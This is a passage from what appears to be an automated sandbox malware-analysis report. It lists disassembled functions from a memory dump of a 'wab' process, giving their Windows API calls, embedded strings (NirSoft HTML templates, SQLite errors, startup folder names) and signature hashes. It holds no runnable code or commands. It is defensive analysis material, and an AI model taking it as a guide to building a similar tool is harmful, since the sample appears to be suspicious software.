                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                  • String ID:
                  • API String ID: 552707033-0
                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                  • memcpy.MSVCRT ref: 0040C11B
                  • strchr.MSVCRT ref: 0040C140
                  • strchr.MSVCRT ref: 0040C151
                  • _strlwr.MSVCRT ref: 0040C15F
                  • memset.MSVCRT ref: 0040C17A
                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                  • String ID: 4$h
                  • API String ID: 4066021378-1856150674
                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: %%0.%df
                  • API String ID: 3473751417-763548558
                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                  APIs
                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                  • KillTimer.USER32(?,00000041), ref: 004060D7
                  • KillTimer.USER32(?,00000041), ref: 004060E8
                  • GetTickCount.KERNEL32 ref: 0040610B
                  • GetParent.USER32(?), ref: 00406136
                  • SendMessageW.USER32(00000000), ref: 0040613D
                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                  • String ID: A
                  • API String ID: 2892645895-3554254475
                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                  APIs
                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                  • GetDesktopWindow.USER32 ref: 0040D9FD
                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                  • memset.MSVCRT ref: 0040DA23
                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                  • String ID: caption
                  • API String ID: 973020956-4135340389
                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                  APIs
                  Strings
                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf$wcscpy
                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                  • API String ID: 1283228442-2366825230
                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                  APIs
                  • wcschr.MSVCRT ref: 00413972
                  • wcscpy.MSVCRT ref: 00413982
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  • wcscpy.MSVCRT ref: 004139D1
                  • wcscat.MSVCRT ref: 004139DC
                  • memset.MSVCRT ref: 004139B8
                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                  • memset.MSVCRT ref: 00413A00
                  • memcpy.MSVCRT ref: 00413A1B
                  • wcscat.MSVCRT ref: 00413A27
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                  • String ID: \systemroot
                  • API String ID: 4173585201-1821301763
                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy
                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                  • API String ID: 1284135714-318151290
                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                  • String ID: 0$6
                  • API String ID: 4066108131-3849865405
                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                  APIs
                  • memset.MSVCRT ref: 004082EF
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                  • memset.MSVCRT ref: 00408362
                  • memset.MSVCRT ref: 00408377
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiWide
                  • String ID:
                  • API String ID: 290601579-0
                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memchrmemset
                  • String ID: PD$PD
                  • API String ID: 1581201632-2312785699
                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                  • GetDC.USER32(00000000), ref: 00409F6E
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                  • GetParent.USER32(?), ref: 00409FA5
                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                  • String ID:
                  • API String ID: 2163313125-0
                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$wcslen
                  • String ID:
                  • API String ID: 239872665-3916222277
                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$_snwprintfmemset
                  • String ID: %s (%s)$YV@
                  • API String ID: 3979103747-598926743
                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                  APIs
                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                  • wcslen.MSVCRT ref: 0040A6B1
                  • wcscpy.MSVCRT ref: 0040A6C1
                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                  • wcscpy.MSVCRT ref: 0040A6DB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                  • String ID: Unknown Error$netmsg.dll
                  • API String ID: 2767993716-572158859
                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                  APIs
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 0040DAFB
                  • wcscpy.MSVCRT ref: 0040DB0B
                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfilewcscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 3176057301-2039793938
                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                  APIs
                  Strings
                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                  • out of memory, xrefs: 0042F865
                  • cannot ATTACH database within transaction, xrefs: 0042F663
                  • unable to open database: %s, xrefs: 0042F84E
                  • too many attached databases - max %d, xrefs: 0042F64D
                  • database %s is already in use, xrefs: 0042F6C5
                  • database is already attached, xrefs: 0042F721
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                  • API String ID: 1297977491-2001300268
                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                  • memcpy.MSVCRT ref: 0040EB80
                  • memcpy.MSVCRT ref: 0040EB94
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                  • String ID: ($d
                  • API String ID: 1140211610-1915259565
                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                  APIs
                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                  • Sleep.KERNEL32(00000001), ref: 004178E9
                  • GetLastError.KERNEL32 ref: 004178FB
                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockSleepUnlock
                  • String ID:
                  • API String ID: 3015003838-0
                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                  APIs
                  • memset.MSVCRT ref: 00407E44
                  • memset.MSVCRT ref: 00407E5B
                  • _mbscpy.MSVCRT ref: 00407E7E
                  • _mbscpy.MSVCRT ref: 00407ED7
                  • _mbscpy.MSVCRT ref: 00407EEE
                  • _mbscpy.MSVCRT ref: 00407F01
                  • wcscpy.MSVCRT ref: 00407F10
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                  • String ID:
                  • API String ID: 59245283-0
                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                  APIs
                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                  • GetLastError.KERNEL32 ref: 0041855C
                  • Sleep.KERNEL32(00000064), ref: 00418571
                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                  • GetLastError.KERNEL32 ref: 0041858E
                  • Sleep.KERNEL32(00000064), ref: 004185A3
                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                  • String ID:
                  • API String ID: 3467550082-0
                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                  • memset.MSVCRT ref: 00413ADC
                  • memset.MSVCRT ref: 00413AEC
                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                  • memset.MSVCRT ref: 00413BD7
                  • wcscpy.MSVCRT ref: 00413BF8
                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                  • String ID: 3A
                  • API String ID: 3300951397-293699754
